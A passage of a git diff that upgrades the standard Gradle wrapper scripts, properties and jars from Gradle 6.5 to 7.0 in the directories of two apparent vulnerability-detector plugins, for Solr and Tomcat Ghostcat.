goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/solr_cve201917558/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/solr_cve201917558/gradlew b/google/detectors/rce/solr_cve201917558/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/solr_cve201917558/gradlew +++ b/google/detectors/rce/solr_cve201917558/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/solr_cve201917558/gradlew.bat b/google/detectors/rce/solr_cve201917558/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/solr_cve201917558/gradlew.bat +++ b/google/detectors/rce/solr_cve201917558/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/tomcat/ghostcat/gradlew b/google/detectors/rce/tomcat/ghostcat/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/tomcat/ghostcat/gradlew +++ b/google/detectors/rce/tomcat/ghostcat/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/tomcat/ghostcat/gradlew.bat b/google/detectors/rce/tomcat/ghostcat/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/tomcat/ghostcat/gradlew.bat +++ b/google/detectors/rce/tomcat/ghostcat/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == 